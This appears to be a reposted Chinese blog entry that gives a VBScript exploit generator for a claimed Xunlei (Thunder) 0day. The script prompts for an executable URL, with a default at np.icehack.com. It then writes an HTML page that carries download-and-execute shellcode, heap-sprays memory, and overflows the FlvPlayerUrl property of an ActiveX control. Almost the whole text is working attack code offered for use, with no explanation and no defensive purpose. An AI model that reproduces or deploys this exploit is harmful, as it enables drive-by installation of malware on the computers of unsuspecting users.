[vbs也写EXP]xunlei_0day_exp

来源:vbs空间


exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\x43\x43\x43\x43\x43\x43\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f\x70"
down=exeurl&Chr(00)
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "\x" & temp
Next
Unicode = str
End Function
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)

fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var expires = new Date();"
fileS.writeline "expires.setTime(expires.getTime() + 0 * 0 * 1 * 1000);"
fileS.writeline "var set_cookie = document.cookie.indexOf(""say_hello=""); "
fileS.writeline "if (set_cookie == -1){document.cookie = ""say_hello=1;expires="" + expires.toGMTString();"
fileS.writeline "document.write('<object id=""gl"" classid=""clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F""></object>');"
fileS.writeline "var helloworld2Address = 0x0c0c0c0c;"
fileS.writeline "var shellcode = unescape("""&replaceregex(code&Unicode(down))&""");"
fileS.writeline "var hbshelloworld = 0x100000;"
fileS.writeline "var payLoadSize = shellcode.length * 2;"
fileS.writeline "var spraySlideSize = hbshelloworld - (payLoadSize+0x38);"
fileS.writeline "var spraySlide = unescape(""%u0c0c%u0c0c"");"
fileS.writeline "spraySlide = getSpraySlide(spraySlide,spraySlideSize);"
fileS.writeline "heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (i=0;i<heapBlocks;i++)"
fileS.writeline "{"
fileS.writeline " memory[i] = spraySlide + shellcode;"
fileS.writeline "}"
fileS.writeline "function getSpraySlide(spraySlide, spraySlideSize)"
fileS.writeline "{"
fileS.writeline "while (spraySlide.length*2<spraySlideSize)"
fileS.writeline "{"
fileS.writeline " spraySlide += spraySlide;"
fileS.writeline "}"
fileS.writeline "spraySlide = spraySlide.substring(0,spraySlideSize/2);"
fileS.writeline "return spraySlide;"
fileS.writeline "}"
fileS.writeline "var size_buff = 1070;"
fileS.writeline "var x = unescape(""%0c%0c%0c%0c"");"
fileS.writeline "while (x.length<size_buff) x += x;"
fileS.writeline "gl.FlvPlayerUrl = x;"
fileS.writeline "}"
fileS.writeline "</SCRIPT>"
fileS.writeline "<script>"
fileS.writeline "if (set_cookie == -1){"
fileS.writeline "location.reload();"
fileS.writeline "}"
fileS.writeline "</script>"files.Close
Set fso=nothing
msgbox "生成完毕!"
end if

相关日志

发表评论